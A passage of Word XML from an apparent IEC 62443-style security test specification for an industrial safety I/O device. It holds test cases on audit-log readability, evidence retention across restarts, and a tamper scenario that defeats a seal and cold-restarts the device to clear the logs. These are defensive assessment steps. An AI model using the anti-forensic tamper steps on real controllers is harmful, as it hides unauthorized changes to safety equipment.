                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="021429C0" w14:textId="585D4CFA" w:rsidR="0021004D" w:rsidRPr="006D5B99"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21004D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="0021004D" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E5FC400" w14:textId="3DBD783A" w:rsidR="0021004D" w:rsidRPr="006D5B99"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21004D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="0021004D" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="044A489A" w14:textId="348B899E" w:rsidR="0021004D" w:rsidRPr="006D5B99"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intervention-evidence mechanisms exist and are readable (audit/error log; the parameter-change counter; the configuration signature), confirming that audit accessibility is met while </w:t>
            </w:r>
            <w:r w:rsidR="00E213CC" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>characterizing</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> the content's limitations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0021004D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="0021004D" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62B62CAA"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and the identity/configuration records at a known-good baseline.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01DC62C8" w14:textId="4041E998"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one </w:t>
            </w:r>
            <w:r w:rsidR="00C31359" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>authorized</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> parameter change.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EC65125" w14:textId="77777777" w:rsidR="00286347"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Re-read; confirm the change counter incremented and the </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>configuration signature changed.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15D53183" w14:textId="1923E504" w:rsidR="0021004D" w:rsidRPr="006D5B99"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each record for the presence of actor identity and absolute timestamp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0021004D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="0021004D" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="516C84F5" w14:textId="77777777" w:rsidR="00686D0C"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records are readable and the change is reflected (accessibility + partial auditability confirmed). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F5E457F" w14:textId="34418A89" w:rsidR="0021004D" w:rsidRPr="006D5B99"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record carries an actor identity or an absolute timestamp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C8BE5B6" w14:textId="77777777" w:rsidR="0021004D" w:rsidRPr="006D5B99" w:rsidRDefault="0021004D" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CB5945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7C331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B57029A" w14:textId="7F931E86" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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TC-RQ-003-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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6400A0CD" w14:textId="437103B9" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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IoT-Core read + I&amp;M read via TIA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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25A5B47" w14:textId="504E76F0" w:rsidR="00B73A1A"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 Online &amp; Diagnose.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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005BF75B" w14:textId="5C130683" w:rsidR="00E50EFF" w:rsidRPr="006D5B99"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curl -s http://$</w:t>
            </w:r>
            <w:r w:rsidR="001104CF">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SRIO/devicestatus/errorlog/loglist/getdata</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">  | tee cm_rq003-01_errorlog.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5999D0E9" w14:textId="4E6B906C" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00E50EFF" w:rsidP="00E50EF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In TIA: read I&amp;M4 signature (before/after one param change).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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6365233" w14:textId="77777777" w:rsidR="00B92C53"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Expected: log + records readable (accessibility PASS); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44D8B6AD" w14:textId="77777777" w:rsidR="00B92C53"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 xml:space="preserve">I&amp;M4 signature changes. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2426DFC5" w14:textId="0CFC4466" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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6D5B99">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Documented shortfall: no record carries actor identity or absolute timestamp. Evidence: cm_rq003-01_errorlog.json, TIA I&amp;M0/I&amp;M4 screenshots (before/after).</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7DF0437D" w14:textId="77777777" w:rsidR="00EF7F75" w:rsidRPr="006D5B99" w:rsidRDefault="00EF7F75" w:rsidP="004B3AEF">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68166A68" w14:textId="43C8132A" w:rsidR="00EF7F75" w:rsidRPr="006D5B99" w:rsidRDefault="005A760D" w:rsidP="007D5397">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ003-0</w:t>
      </w:r>
      <w:r w:rsidR="008E72AE" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="008C098B" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Authorized Intervention Evidence Under Normal Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5CBE7F" w14:textId="0559FB9D" w:rsidR="004B3AEF" w:rsidRPr="006D5B99" w:rsidRDefault="004B3AEF" w:rsidP="004B3AE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6D5B99"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0F66ED18"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150A2ED" w14:textId="61EEBEEA"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RQ-003 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 2.8 / CR 2.11 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset I, Asset G</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E72AE" w:rsidRPr="006D5B99"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190FCA28" w14:textId="72B9602A" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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5D9030B5" w14:textId="5E387E90" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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8E72AE" w:rsidRPr="006D5B99"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0337D83" w14:textId="52019DC4" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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an authorized address/parameter change followed by a restart generates any retained, time-referenceable evidence of the intervention.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E72AE" w:rsidRPr="006D5B99"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04C517D1"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Baseline the evidence stores.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="182F6F3D" w14:textId="707D7D63"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E666B3" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>authorized</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> address/parameter change and restart.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ECB477B" w14:textId="77777777" w:rsidR="00EE01CB"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evidence stores.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AC97767" w14:textId="07822F1A" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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retention and time-referenceability of any generated record.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E72AE" w:rsidRPr="006D5B99"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52DEFB41" w14:textId="77777777" w:rsidR="00BE7041"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if a retained, time-referenceable record of the intervention exists after restart.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22F8B3A3" w14:textId="418CD548" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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Expected shortfall: evidence detail is not retained/time-referenceable across the restart (feeds the retention and timestamp gaps).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="061365BF" w14:textId="77777777" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="008E72AE" w:rsidP="004B3AEF">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="040E5086"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417FE4A8"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4166CA2D" w14:textId="0BC31180" w:rsidR="004B3AEF" w:rsidRPr="006D5B99" w:rsidRDefault="00BB1C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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C6CA59B" w14:textId="27427B30" w:rsidR="004B3AEF" w:rsidRPr="006D5B99" w:rsidRDefault="00094937"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NV1 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BB46DE4" w14:textId="3C7CAAFE" w:rsidR="004B3AEF" w:rsidRPr="006D5B99" w:rsidRDefault="0039736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4B3AEF" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C46F262"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8CD6295"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(Kali):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A4BC4D2" w14:textId="17DD3A65"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/getdata | tee cm_rq003-02_before.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07CA8C33"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14C4BAEE" w14:textId="2A9C37DE"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Authorized change in TIA Portal </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E274707" w14:textId="02A4473A" w:rsidR="001615BF" w:rsidRPr="006D5B99" w:rsidRDefault="001615BF" w:rsidP="00172182">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a) Open the TIA project &gt; Hardware/network view &gt; select</w:t>
            </w:r>
            <w:r w:rsidR="00172182" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>AL400S</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43DCC51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 Properties &gt; Module parameters (e.g. Filter F-DI 1: 10 ms -&gt; 5 ms)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0781CC6A"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Recalculate the iParCRC via the ifm-CRC-Tool (right-click the</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="198BB5CF"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module &gt; 'Start device tool' &gt; select 'ifm-CRC-Tool' &gt; confirm</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FCA7BA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parameters are correct &gt; update F_iPar_CRC, SRIO-20292)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35F57028" w14:textId="70711EB3"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 Compile and download to the PLC ('Online' &gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23DC8FDD"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'Download to device')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F87E940"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 Power-cycle the SRIO (cold start)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C0C1F87"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p>
          <w:p w14:paraId="782271BB" w14:textId="77777777"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After the cold start (Kali):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C71FE28" w14:textId="6EF6AE94" w:rsidR="001615BF" w:rsidRPr="006D5B99" w:rsidRDefault="001615BF" w:rsidP="001615BF">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/getdata | tee cm_rq003-02_after.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D365CEC" w14:textId="1C301BAD" w:rsidR="004B3AEF" w:rsidRPr="006D5B99" w:rsidRDefault="001615BF" w:rsidP="001615B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diff cm_rq003-02_before.json cm_rq003-02_after.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B3AEF" w:rsidRPr="006D5B99"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3DFDAAF7" w:rsidR="004B3AEF" w:rsidRPr="006D5B99" w:rsidRDefault="00505773" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4974FD4C" w14:textId="77777777" w:rsidR="005A6E9B"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Post-reboot detail cleared (cold start), no absolute timestamp; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="588CF33E" w14:textId="77777777" w:rsidR="005A6E9B"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only counter delta persists. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78A77A26" w14:textId="22E52E8A" w:rsidR="004B3AEF" w:rsidRPr="006D5B99" w:rsidRDefault="00D3605A"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Evidence: before/after js</w:t>
            </w:r>
            <w:r w:rsidR="00CE1C3B" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>o</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>n + TIA I&amp;M.</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46DEF34F" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78177774" w14:textId="53B1EE7E" w:rsidR="004B3AEF" w:rsidRPr="006D5B99" w:rsidRDefault="009100BF" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ003-0</w:t>
      </w:r>
      <w:r w:rsidR="008E72AE" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00BE7041" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Illegitimate Physical Intervention &amp; Anti-Forensic Clearing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27763528" w14:textId="5575E572" w:rsidR="004B3AEF" w:rsidRPr="006D5B99" w:rsidRDefault="004B3AEF" w:rsidP="004B3AEF">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Level 1 - Abstract Test Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC062F1" w14:textId="77777777" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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45F8D7CA"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40E366C6" w14:textId="40802877"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EDR 3.11 (detection) / CR 2.8 / CR 3.9 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset G, Asset I</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E72AE" w:rsidRPr="006D5B99"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59AE4E32" w14:textId="1563DAE7" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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2630F7C6" w14:textId="79E154CD" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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8E72AE" w:rsidRPr="006D5B99"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0D47BD67" w14:textId="77777777"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08D9DBA9" w14:textId="42B691CD" w:rsidR="00377602"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physical intervention avoiding visible seal damage produces no automatic tamper record and no attribution, and </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A103F0A" w14:textId="496E23B6" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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 subsequent cold start clears any incidental log content, proving the device cannot collect retained, protected evidence of the intervention.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E72AE" w:rsidRPr="006D5B99"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68D5C387"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 the baseline log, records, and address.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BBB02A8"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Defeat the seal carefully; alter the interface (including entry into a special mode); note any live status change.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0061E776"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Cold-restart to apply the change.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46F95A3B" w14:textId="77777777" w:rsidR="00D210FF"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the log; check for any tamper/intervention entry and whether the log survived the restart.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78B89850" w14:textId="67076465" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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attribution and timing of anything found.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E72AE" w:rsidRPr="006D5B99"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093CA3B1" w14:textId="013C4BDA" w:rsidR="00D210FF"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03012A" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>characterization</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> test. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56FB9F5A" w14:textId="6B67BFCF" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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tamper-specific entry; incidental entries lost on cold start; </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">no actor identity and no absolute timestamp </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms the missing-detection and unprotected-evidence gaps </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> FAIL against RQ-003. A persistent, attributed, time-stamped tamper record would indicate an undocumented capability (investigate).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A7B0C13" w14:textId="77777777" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="008E72AE" w:rsidP="004B3AEF">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CE1FD7E" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRPr="006D5B99" w:rsidRDefault="004B3AEF" w:rsidP="004B3AE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6D5B99"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6D5B99" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AA4BC49" w14:textId="77777777" w:rsidR="004B3AEF" w:rsidRPr="006D5B99"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3AEF" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="004B3AEF" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
